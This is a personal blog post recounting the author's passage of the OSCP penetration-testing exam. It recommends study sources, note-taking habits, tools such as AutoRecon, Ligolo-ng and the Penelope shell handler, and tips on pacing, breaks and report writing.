OSCP Exam guide: Tools, Tips and Lessons Learned

I just recently passed the OSCP exam and I can tell you all it was a really stressful but rewarding experience. I was full of questions and doubts therefore I decided to make a guide to share my experience and give some advice for anyone who may be in my same position.

My Preparation Process

First off, yes, the exam is challenging (depending on your experience), and you need knowledge in a wide range of topics. This isn’t an exam you can attempt with minimal experience in offensive security or limited practice with CTFs. In my experience, OffSec’s materials are not enough on their own—you’ll want to study from other sources as well. Before the exam, I already held the GPEN (SANS SEC560) certification and had done quite a few CTFs on Hack The Box and Try Hack Me. I also completed OffSec’s Challenge OSCP A, B, and C, as they closely simulate the exam environment.

Notes and Cheatsheets

To keep my notes and cheatsheets organized, I used Obsidian. My approach included a mix of tagging, referencing, and indexing to easily find what I needed, plus, I made cheatsheets for every tool I planned to use. I created a custom GPT for this purpose which I will share with you:

https://chatgpt.com/g/g-hknlo6ALS-tools-cheatsheet-generator

To use this GPT you just need to write the name of the tool you want the cheatsheet for and it will search online for the most up to date commands list. It will list the sources it accessed and it will output the full cheatsheet in Markdown, so you can just copy paste it in Obsidian (or your favorite editor). The cheatsheet will include a brief explanation of the tool, the most important flags, and several use case examples. Examples use variables (like $attacker or $lport) for IPs and ports, so if you set these as environment variables, you can just copy-paste the commands. (Remember, AI tools aren’t allowed during the exam, so make sure to prepare all cheatsheets in advance!)

Essential Tools (In my opinion)

Here are the tools I relied on and I highly recommend for the exam:

Penelope - https://github.com/brightio/penelope

This is not only a reverse shell handler, it can handle multiple sessions, it will upgrade your shell when possible and it integrates an extremely useful upload/download file feature among the others.

Python Upload Server: https://pypi.org/project/uploadserver/

This server not only enables file download (like 'python -m http.server 8000'), but also lets you upload files through a browser on the target machine. It’s incredibly useful when you need to quickly upload files in RDP sessions.

Ligolo-ng - https://github.com/nicocha30/ligolo-ng

Forget about port forwarding, ssh tunneling, metasploit or proxychains-ng. This is everything you need for pivoting! Super easy to setup and incredibly efficient.

AutoRecon - https://github.com/Tib3rius/AutoRecon

If you can automate repetitive tasks, you MUST automate them! AutoRecon saves loads of time by running full nmap scans, dirbuster, and more. Plus, it suggests manual commands based on findings. Remember, it runs as root, so you might need to adjust permissions on folders if you plan to edit files.

Shell logging script - https://sechurity.com/this-custom-script-literally-saved-me-from-failing-oscp/

You really need to have your shells logged. The title of this article is not overrated. I had the same. I forgot a couple of screenshots, but I was able to retrieve them thanks to the logs.

I recommend creating one folder per standalone machine and one for the AD set, closing terminals after each and moving logs to the respective folder to stay organized.

How I Approached my Exam

I started my exam at 17:00, dedicating about 7-8 hours to reach at least 30 points on standalone machines (as you need 70 total points and the AD set alone gives you 40). I planned to take screen breaks every 2 hours (if it did not interrupt my workflow) and aimed for at least 6 hours of sleep. I started AutoRecon on the three standalone machines right at 17:00 and targeted the machine with the fewest open ports first. I did manage to fully pwn the first host in about 3/4 hours (initial access +privilege escalation). At this point I was planning to just get the initial access on another host and start the AD set, but luckily I was able to discover the privilege escalation vector during the enumeration of the second standalone. It took me longer to gain initial foothold than to escalate privileges XD.

By midnight, I started AutoRecon on the AD set, did some manual enumeration, and forced myself to bed around 1:00 AM. I rarely slept so bad. I woke up several times and I was mostly dreaming about bloodhound (not kidding, I literally dreamed about python scripts and bloodhound). Around 7:30 my alarm went off and after walking my dog I went immediately working on the AD set, taking brakes every 2 hours and sometimes even 1 hour. By around 15:30, I completed the AD set, with just enough time left to double-check my screenshots and notes. Since I had to work the next day, I immediately started my final report, wrapping it up around 00:30 and making a few last-minute tweaks during my lunch break the day after.

My key Takeaways for OSCP Success!

Here’s what worked for me, and a few things I would tweak if I could go back:

• Time off: I took only 2 days off from work for the exam. - In hindsight, an extra day just for the report would have been invaluable—your brain is fried after the exam!
• Take breaks and sleep: This exam is a marathon, so listen to your body. A 15-minute break can give you a fresh perspective on a problem. Sometimes you are simply stuck in the wrong rabbit hole and forcing yourself to stop take a walk and go back may help you looking at things from a different point of view, or maybe try something totally different.
• Log everything: A shell logging script can literally save your exam. Keep logs organized by session to avoid any last-minute stress.
• Organize your tools: Have a structured folder with all your tools and exploits. Know where to find what you need right away without hunting.
• Organize your notes: I used a mix of indexing, folders, and tags in Obsidian. Use what works best for you to keep everything easily accessible.
• Use aliases: Save time by creating aliases for commonly used commands with multiple arguments such as:

alias autorecon='sudo env "PATH=$PATH" autorecon'

alias penelope='python3 /path/to/penelopy.py'

• Prepare the report during the exam: Take screenshots and notes in a report-like format, saving you time when it’s due. I created separate files for each standalone machine and the AD set.
• Try Sploitus: Don't use only searchploit, vulndb, github and google. Try also sploitus, https://sploitus.com/ . I was able to find some extra exploit there!

Conclusion

Passing the OSCP is tough, but with the right tools, strategy, and well-timed breaks, it’s doable. Stay calm, keep organized, and pace yourself. Best of luck to anyone taking on this challenge!

If you have questions or found this blog helpful, feel free to reach out. I’d love to hear from you!